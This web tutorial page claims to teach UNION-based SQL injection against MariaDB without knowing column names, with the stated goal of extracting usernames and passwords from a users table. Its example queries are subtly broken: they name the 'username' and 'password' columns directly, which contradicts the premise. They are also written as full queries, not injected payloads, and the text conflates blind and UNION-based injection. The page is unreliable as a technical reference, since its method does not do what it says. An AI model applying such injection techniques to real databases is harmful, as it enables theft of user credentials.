Extract Data Without Columns Name

Context

In this guide, we will explore how to extract data from a MariaDB database using UNION-based SQL injection without the necessity of knowing the column names. This technique exploits numerical indexing of columns and is particularly useful in blind SQL injection scenarios where information about the database schema is not available. This guide assumes you are familiar with basic SQL queries, database schema concepts, and UNION SELECT statements in the context of MariaDB Union-Based SQL injection.

Theory

Column Indexing in SQL Queries

Column indexing in SQL refers to the practice of using numerical indices instead of column names to query data. In SQL queries, columns can be referenced using their positional index (starting from 1) within the SELECT clause. This allows you to interact with the database even when column names are unknown, which is the case in some restrictive SQL injection scenarios where the information schema is not accessible.

Blind Select Techniques

Blind Select is a technique used to extract data from a database when direct visibility into the schema (like column names) is not possible. By leveraging the UNION SELECT statement, attackers can guess and use column indices instead. This involves executing a series of iterations to determine the structure of the target table and uncover sensitive information.

Offset Guessing in SQL Injection

Offset guessing involves iteratively testing different column indices in SQL queries to find the valid ones. This step-by-step approach is a part of the blind SQL injection technique where UNION SELECT statements are crafted to incrementally adjust guessed indices until successful data retrieval is achieved. This method requires persistence and a thorough understanding of SQL syntax to adjust queries accurately.

Practice

Extract Data Using UNION SELECT Without Column Names

To exploit a database using UNION-based SQL injection without knowing the column names, follow these steps:

  • Initial Column Count Test

    • Perform an initial test to determine the number of columns in the table.
    SELECT 1,2,3 FROM users WHERE id=1 UNION SELECT 1,2,3 FROM users;

    This initial test helps identify the number of columns present in the database table by matching the columns in both SELECT clauses.

  • Blind Column Index Replacement

    • Replace guessed column indices to start uncovering specific column data, such as usernames.
    SELECT 1,username,3 FROM users WHERE id=1 UNION SELECT 1,2,3 FROM users;

    Iterate over available indices to check if the column index guesses align with actual data columns.

  • Sensitive Data Extraction

    • Continue replacing indices to position queries towards sensitive data such as passwords.
    SELECT 1,2,password FROM users WHERE id=1 UNION SELECT 1,2,3 FROM users;

    Persist in adjusting indices for each iteration to extract required sensitive information comprehensively.

Through this methodology, you access user data from the database, enabling data exploitation without initially having any knowledge of the column names.

Tools

  • sqlmap
  • Burp Suite

The tools mentioned can assist in automating some steps and analyzing the responses of SQL injection attempts to refine and expedite the column guessing process.

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.